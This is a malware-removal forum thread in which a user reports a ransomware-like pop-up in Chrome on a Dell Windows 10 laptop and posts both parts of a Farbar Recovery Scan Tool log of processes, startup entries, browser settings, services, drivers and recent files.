Solved Ransomware infection

[RichH]

Hello Broni and all...

Dell Laptop, Win10, Defender on and up to date
Scanned clean by MalwareBytes Anti-Malware
Ransomware shows in Chrome. Stops when Chrome shut off, but PC remains running slow.


FRST
Begin Part1

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 02-07-2017
Ran by Herbert Holland (administrator) on DESKTOP-47E6V0K (03-07-2017 12:55:21)
Running from C:\Users\Herbert Holland\Desktop
Loaded Profiles: Herbert Holland (Available Profiles: Herbert Holland)
Platform: Windows 10 Home Version 1703 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool:

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Windows (R) Win 7 DDK provider) C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\AdminService.exe
(Microsoft Corporation) C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_service.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Waves Audio Ltd.) C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_comm_customer.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_system_customer.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Citrix Systems, Inc.) C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_user_customer.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Windows\System32\igfxTray.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MSASCuiL.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
(Dell Inc.) C:\Program Files (x86)\Dell Customer Connect\DCCService.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Dell Inc.) C:\Program Files\Dell\Dell Help & Support\MDLCSvc.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe
(Dell Products, LP.) C:\Program Files (x86)\Dell Digital Delivery\DeliveryService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpService.exe
(Dell Inc.) C:\Program Files (x86)\Dell Update\DellUpTray.exe
(Intel Corporation) C:\Program Files (x86)\Intel\TXE Components\DAL\jhi_service.exe
(Dell) C:\Program Files\Dell\Dell Product Registration\PRSvc.exe
(Dell Inc.) C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe
(Dell Inc.) C:\Program Files\Dell\DellDataVault\DellDataVault.exe
(Dell) C:\Program Files\Dell\Dell Foundation Services\DFS.Common.Agent.exe
(Microsoft Corporation) C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
(Google Inc.) C:\Windows\Temp\59.0.3071.115_58.0.3029.110_chrome_updater.exe2a33f6e1
(Google Inc.) C:\Windows\Temp\CR_73B17.tmp\setup.exe
(Google Inc.) C:\Windows\Temp\CR_73B17.tmp\setup.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgent.exe
(Microsoft Corporation) C:\Windows\System32\InstallAgentUserBroker.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
(Microsoft Corporation) C:\Windows\System32\CompatTelRunner.exe
() C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe
(Microsoft Corporation) C:\Windows\System32\smartscreen.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
(Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

==================== Registry (Whitelisted) ====================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SecurityHealth] => C:\Program Files\Windows Defender\MSASCuiL.exe [629152 2017-03-18] (Microsoft Corporation)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [8725248 2015-11-06] (Realtek Semiconductor)
HKLM\...\Run: [RtHDVBg] => C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe [1407744 2015-11-06] (Realtek Semiconductor)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3946600 2015-10-15] (Synaptics Incorporated)
HKLM\...\Run: [QuickSet] => c:\Program Files\Dell\QuickSet\QuickSet.exe [3877936 2015-06-12] (Dell Inc.)
HKLM\...\Run: [WavesSvc] => C:\Program Files\Waves\MaxxAudio\WavesSvc64.exe [717744 2015-11-02] (Waves Audio Ltd.)
HKLM-x32\...\Run: [isa] => C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [330240 2015-02-26] ()
Winlogon\Notify\GoToAssist Express Customer: C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_winlogonx64.dll (Citrix Systems, Inc.)
GroupPolicy: Restriction <==== ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.100.1
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{21d552df-608c-4364-b73f-e63eb3f2a328}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{95685ee5-eeb2-4515-9c5d-b09ee292d1f8}: [DhcpNameServer] 82.163.143.157
Tcpip\..\Interfaces\{b2819a59-050d-46e7-bac8-ef33e380672f}: [DhcpNameServer] 192.168.100.1
Tcpip\..\Interfaces\{bafee63c-6366-43b0-ae6c-7237f2573316}: [DhcpNameServer] 172.91.1.171

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131411833229247423&GUID=D4471B74-5BE9-4FE5-BB28-9C0D0DEF4147
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://go.microsoft.com/fwlink/?LinkID=617910&ResetID=131411833231295883&GUID=D4471B74-5BE9-4FE5-BB28-9C0D0DEF4147
HKU\S-1-5-21-38309054-1687653055-3029875360-1001\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://dell15.msn.com/?pc=DCTE
SearchScopes: HKLM -> DefaultScope {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM -> {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> DefaultScope {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKLM-x32 -> {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-38309054-1687653055-3029875360-1001 -> DefaultScope {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
SearchScopes: HKU\S-1-5-21-38309054-1687653055-3029875360-1001 -> {DD8B0B28-687B-4D7A-B8EC-13E3CD3824F7} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSE1
BHO: Lync Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\OCHelper.dll [2017-06-18] (Microsoft Corporation)
BHO: Microsoft OneDrive for Business Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files (x86)\Microsoft Office\root\VFS\ProgramFilesX64\Microsoft Office\Office16\GROOVEEX.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: mso-minsb-roaming.16 - {83C25742-A9F7-49FB-9138-434302C88D07} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: mso-minsb.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: osf-roaming.16 - {42089D2D-912D-4018-9087-2B87803E93FB} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)
Handler-x32: osf.16 - {5504BE45-A83B-4808-900A-3A5C36E7F77A} - C:\Program Files (x86)\Microsoft Office\root\Office16\MSOSB.DLL [2017-06-18] (Microsoft Corporation)

FireFox:
========
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.56 -> C:\Program Files (x86)\Intel\TXE Components\IPT\npIntelWebAPIIPT.dll [2014-07-02] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\TXE Components\IPT\npIntelWebAPIUpdater.dll [2014-07-02] (Intel Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files (x86)\Microsoft Office\root\Office16\NPSPWRAP.DLL [2017-05-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.33.5\npGoogleUpdate3.dll [2017-04-30] (Google Inc.)
FF Plugin HKU\S-1-5-21-38309054-1687653055-3029875360-1001: @citrixonline.com/appdetectorplugin -> C:\Users\Herbert Holland\AppData\Local\Citrix\Plugins\104\npappdetector.dll [2017-06-13] (Citrix Online)

Chrome:
=======
CHR DefaultSearchURL: Default -> hxxp://srch.bar/{searchTerms}
CHR DefaultSuggestURL: Default -> hxxp://srch.bar/?s={searchTerms}
CHR Profile: C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default [2017-07-03]
CHR Extension: (Google Slides) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2016-08-21]
CHR Extension: (Google Docs) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2016-08-21]
CHR Extension: (Google Drive) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2016-08-21]
CHR Extension: (YouTube) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2016-08-21]
CHR Extension: (Google Sheets) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2016-08-21]
CHR Extension: (Google Docs Offline) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2016-12-09]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2017-06-05]
CHR Extension: (Gmail) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2016-08-21]
CHR Extension: (Chrome Media Router) - C:\Users\Herbert Holland\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2017-06-05]
CHR HKLM\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKU\S-1-5-21-38309054-1687653055-3029875360-1001\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [nahhmpbckpgdidfnmfkfgiflpjijilce] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AtherosSvc; C:\Program Files (x86)\Dell Wireless\Bluetooth Suite\adminservice.exe [323152 2015-06-07] (Windows (R) Win 7 DDK provider)
R2 ClickToRunSvc; C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe [4122816 2017-06-10] (Microsoft Corporation)
S2 dbupdate; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-18] (Dropbox, Inc.)
S3 dbupdatem; C:\Program Files (x86)\Dropbox\Update\DropboxUpdate.exe [143144 2016-11-18] (Dropbox, Inc.)
R2 Dell Customer Connect; C:\Program Files (x86)\Dell Customer Connect\DCCService.exe [130936 2016-12-21] (Dell Inc.)
R2 Dell Foundation Services; C:\Program Files\Dell\Dell Foundation Services\DFSSvc.exe [97616 2017-01-11] (Dell)
R2 Dell Help & Support; C:\Program Files\Dell\Dell Help & Support\MDLCSvc.exe [77648 2016-12-22] (Dell Inc.)
R2 DellDataVault; C:\Program Files\Dell\DellDataVault\DellDataVault.exe [2572024 2017-04-11] (Dell Inc.)
R2 DellDataVaultWiz; C:\Program Files\Dell\DellDataVault\DellDataVaultWiz.exe [202488 2017-04-11] (Dell Inc.)
R2 DellUpdate; C:\Program Files (x86)\Dell Update\DellUpService.exe [228216 2016-01-21] (Dell Inc.)
R2 GoToAssist Remote Support Customer; C:\Program Files (x86)\Citrix\GoToAssist Remote Support Customer\1251\g2ax_service.exe [607240 2017-06-13] (Citrix Systems, Inc.)
R2 igfxCUIService2.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [350312 2015-09-09] (Intel Corporation)
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\TXE Components\TCS\SocketHeciServer.exe [881152 2015-05-22] (Intel(R) Corporation)
R3 Intel(R) Security Assist; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isa.exe [330240 2015-02-26] () [File not signed]
S2 isaHelperSvc; C:\Program Files (x86)\Intel\Intel(R) Security Assist\isaHelperService.exe [7680 2015-02-26] () [File not signed]
R2 jhi_service; C:\Program Files (x86)\Intel\TXE Components\DAL\jhi_service.exe [174368 2015-04-21] (Intel Corporation)
R2 Product Registration; c:\Program Files\Dell\Dell Product Registration\PRSvc.exe [47144 2017-04-06] (Dell)
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [307456 2015-11-06] (Realtek Semiconductor)
R2 SupportAssistAgent; C:\Program Files (x86)\Dell\SupportAssistAgent\bin\SupportAssistAgent.exe [32728 2017-04-25] (Dell Inc.)
R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246376 2015-10-15] (Synaptics Incorporated)
R2 WavesSysSvc; C:\Program Files\Waves\MaxxAudio\WavesSysSvc64.exe [578480 2015-09-25] (Waves Audio Ltd.)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [342264 2017-03-18] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [102816 2017-03-18] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 athr; C:\WINDOWS\System32\drivers\athw10x.sys [4325808 2016-07-28] (Qualcomm Atheros Communications, Inc.)
R1 CFRMD; C:\WINDOWS\System32\DRIVERS\CFRMD.sys [40224 2014-12-25] (Windows (R) Win 7 DDK provider)
R3 DDDriver; C:\WINDOWS\system32\drivers\DDDriver64Dcsa.sys [32960 2017-04-11] (Dell Inc.)
R3 DellProf; C:\WINDOWS\system32\drivers\DellProf.sys [32568 2017-04-11] (Dell Computer Corporation)
R3 DellRbtn; C:\WINDOWS\System32\drivers\DellRbtn.sys [19440 2015-05-08] (OSR Open Systems Resources, Inc.)
R2 DpmLiteDrv; c:\Program Files\Dell\QuickSet\DpmLiteDrv64.sys [15080 2014-10-15] (Wistron Corp.)
R3 igfxLP; C:\WINDOWS\system32\DRIVERS\igdkmd64lp.sys [5864888 2015-09-09] (Intel Corporation)
R1 MpKslff67fc9e; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{A129455C-9AB7-430C-911B-537C81D0707F}\MpKslff67fc9e.sys [44928 2017-07-03] (Microsoft Corporation)
S3 RTSUER; C:\WINDOWS\system32\Drivers\RtsUer.sys [411712 2015-05-19] (Realsil Semiconductor Corporation)
S3 SDFRd; C:\WINDOWS\System32\drivers\SDFRd.sys [31128 2017-03-18] ()
R3 SynRMIHID; C:\WINDOWS\system32\DRIVERS\SynRMIHID.sys [56936 2015-10-15] (Synaptics Incorporated)
R3 TXEIx64; C:\WINDOWS\System32\drivers\TXEIx64.sys [146232 2015-06-26] (Intel Corporation)
S0 WdBoot; C:\WINDOWS\System32\drivers\WdBoot.sys [44632 2017-03-18] (Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\WdFilter.sys [294816 2017-03-18] (Microsoft Corporation)
R3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [121248 2017-03-18] (Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

end Part 1

 

[RichH]

Begin FRST part 2

==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2017-07-03 12:55 - 2017-07-03 12:56 - 00017350 _____ C:\Users\Herbert Holland\Desktop\FRST.txt
2017-07-03 12:54 - 2017-07-03 12:55 - 00000000 ____D C:\FRST
2017-07-03 12:53 - 2017-07-03 12:53 - 02435584 _____ (Farbar) C:\Users\Herbert Holland\Desktop\FRST64.exe
2017-07-03 12:39 - 2017-07-03 12:39 - 00003304 _____ C:\WINDOWS\System32\Tasks\PCDoctorBackgroundMonitorTask-Retry
2017-07-03 12:39 - 2017-07-03 12:39 - 00003152 _____ C:\WINDOWS\System32\Tasks\SystemToolsDailyTest-Retry
2017-06-23 19:18 - 2017-06-23 19:18 - 05755538 _____ C:\Users\Herbert Holland\Downloads\67ReasonsNottobeGay.pdf
2017-06-22 15:46 - 2017-06-22 15:46 - 00001052 _____ C:\viruses.txt
2017-06-18 08:35 - 2017-06-03 06:09 - 01003624 _____ (Microsoft Corporation) C:\WINDOWS\system32\ucrtbase.dll
2017-06-18 08:35 - 2017-06-03 06:07 - 00119712 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tdx.sys
2017-06-18 08:35 - 2017-06-03 06:00 - 00219040 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tpm.sys
2017-06-18 08:35 - 2017-06-03 05:59 - 01409048 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\gdi32full.dll
2017-06-18 08:35 - 2017-06-03 05:59 - 00626528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fontdrvhost.exe
2017-06-18 08:35 - 2017-06-03 05:59 - 00311200 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\atmfd.dll
2017-06-18 08:35 - 2017-06-03 05:59 - 00259400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotifyIcon.exe
2017-06-18 08:35 - 2017-06-03 05:55 - 02681760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2017-06-18 08:35 - 2017-06-03 05:36 - 01150784 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ucrtbase.dll
2017-06-18 08:35 - 2017-06-03 05:35 - 02259768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreUIComponents.dll
2017-06-18 08:35 - 2017-06-03 05:28 - 23677440 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2017-06-18 08:35 - 2017-06-03 05:26 - 00266640 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\capauthz.dll
2017-06-18 08:35 - 2017-06-03 05:23 - 20373920 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2017-06-18 08:35 - 2017-06-03 05:23 - 06760024 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2017-06-18 08:35 - 2017-06-03 05:23 - 00573856 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\comctl32.dll
2017-06-18 08:35 - 2017-06-03 05:20 - 00583160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CoreMessaging.dll
2017-06-18 08:35 - 2017-06-03 05:14 - 00099328 _____ (Microsoft Corporation) C:\WINDOWS\system32\utcutil.dll
2017-06-18 08:35 - 2017-06-03 05:12 - 00119296 _____ (Microsoft Corporation) C:\WINDOWS\system32\UserDataTimeUtil.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 02958848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2017-06-18 08:35 - 2017-06-03 05:11 - 00128000 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssprxy.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 00052736 _____ (Microsoft Corporation) C:\WINDOWS\system32\musdialoghandlers.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 00038912 _____ (Adobe Systems) C:\WINDOWS\SysWOW64\atmlib.dll
2017-06-18 08:35 - 2017-06-03 05:11 - 00035840 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\BasicRender.sys
2017-06-18 08:35 - 2017-06-03 05:10 - 00293376 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotification.exe
2017-06-18 08:35 - 2017-06-03 05:10 - 00102400 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusNotificationUx.exe
2017-06-18 08:35 - 2017-06-03 05:09 - 00094720 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\UserDataTimeUtil.dll
2017-06-18 08:35 - 2017-06-03 05:07 - 23682048 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2017-06-18 08:35 - 2017-06-03 05:07 - 00721920 _____ (Microsoft Corporation) C:\WINDOWS\system32\MusUpdateHandlers.dll
2017-06-18 08:35 - 2017-06-03 05:07 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tzres.dll
2017-06-18 08:35 - 2017-06-03 05:05 - 00198656 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Security.Authentication.Identity.Provider.dll
2017-06-18 08:35 - 2017-06-03 05:05 - 00169984 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\devicengccredprov.dll
2017-06-18 08:35 - 2017-06-03 05:03 - 19336192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2017-06-18 08:35 - 2017-06-03 05:03 - 00467456 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\TpmCoreProvisioning.dll
2017-06-18 08:35 - 2017-06-03 05:02 - 08245760 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2017-06-18 08:35 - 2017-06-03 05:00 - 03379200 _____ (Microsoft Corporation) C:\WINDOWS\system32\tquery.dll
2017-06-18 08:35 - 2017-06-03 05:00 - 00933376 _____ (Microsoft Corporation) C:\WINDOWS\system32\SearchIndexer.exe
2017-06-18 08:35 - 2017-06-03 04:59 - 02672128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tquery.dll
2017-06-18 08:35 - 2017-06-03 04:59 - 02597376 _____ (Microsoft Corporation) C:\WINDOWS\system32\mssrch.dll
2017-06-18 08:35 - 2017-06-03 04:59 - 00636416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WpcWebFilter.dll
2017-06-18 08:35 - 2017-06-03 04:58 - 05961216 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2017-06-18 08:35 - 2017-06-03 04:58 - 02516480 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2017-06-18 08:35 - 2017-06-03 04:58 - 01046016 _____ (Microsoft Corporation) C:\WINDOWS\system32\ngcsvc.dll
2017-06-18 08:35 - 2017-06-03 04:57 - 06535168 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mspaint.exe
2017-06-18 08:35 - 2017-06-03 04:57 - 01248768 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\AzureSettingSyncProvider.dll
2017-06-18 08:35 - 2017-06-03 04:57 - 00797184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\SearchIndexer.exe
2017-06-18 08:35 - 2017-06-03 04:55 - 02132480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mssrch.dll
2017-06-18 08:35 - 2017-06-03 04:55 - 01019904 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\aadtb.dll
2017-06-18 08:35 - 2017-06-03 04:54 - 02341376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\DWrite.dll
2017-06-18 08:35 - 2017-06-03 04:54 - 02298368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dwmcore.dll
2017-06-18 08:35 - 2017-06-03 04:53 - 04559360 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\dbgeng.dll
2017-06-18 08:34 - 2017-06-03 06:15 - 01596600 _____ (Microsoft Corporation) C:\WINDOWS\system32\gdi32full.dll
2017-06-18 08:34 - 2017-06-03 06:15 - 00750560 _____ (Microsoft Corporation) C:\WINDOWS\system32\fontdrvhost.exe
2017-06-18 08:34 - 2017-06-03 06:15 - 00382368 _____ (Adobe Systems Incorporated) C:\WINDOWS\system32\atmfd.dll
2017-06-18 08:34 - 2017-06-03 06:14 - 01147296 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvix64.exe
2017-06-18 08:34 - 2017-06-03 06:14 - 01024928 _____ (Microsoft Corporation) C:\WINDOWS\system32\hvax64.exe
2017-06-18 08:34 - 2017-06-03 06:09 - 08318880 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2017-06-18 08:34 - 2017-06-03 06:08 - 02969880 _____ (Microsoft Corporation) C:\WINDOWS\system32\CoreUIComponents.dll
2017-06-18 08:34 - 2017-06-03 06:02 - 02444192 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2017-06-18 08:34 - 2017-06-03 06:01 - 05477096 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2017-06-18 08:34 - 2017-06-03 06:00 - 00872472 _____ (Microsoft Corporation) C:\WINDOWS\system32\ClipSVC.dll
2017-06-18 08:34 - 2017-06-03 06:00 - 00321376 _____ (Microsoft Corporation) C:\WINDOWS\system32\capauthz.dll
2017-06-18 08:34 - 2017-06-03 05:58 - 21352696 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2017-06-18 08:34 - 2017-06-03 05:58 - 07904784 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2017-06-18 08:34 - 2017-06-03 05:58 - 00254176 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfps.dll
2017-06-18 08:34 - 2017-06-03 05:14 - 03673088 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2017-06-18 08:34 - 2017-06-03 05:14 - 00443392 _____ (Microsoft Corporation) C:\WINDOWS\system32\PerceptionSimulationExtensions.dll
2017-06-18 08:34 - 2017-06-03 05:11 - 00002560 _____ (Microsoft Corporation) C:\WINDOWS\system32\tzres.dll
2017-06-18 08:34 - 2017-06-03 05:09 - 00271872 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Security.Authentication.Identity.Provider.dll
2017-06-18 08:34 - 2017-06-03 05:09 - 00221184 _____ (Microsoft Corporation) C:\WINDOWS\system32\devicengccredprov.dll
2017-06-18 08:34 - 2017-06-03 05:05 - 20506624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
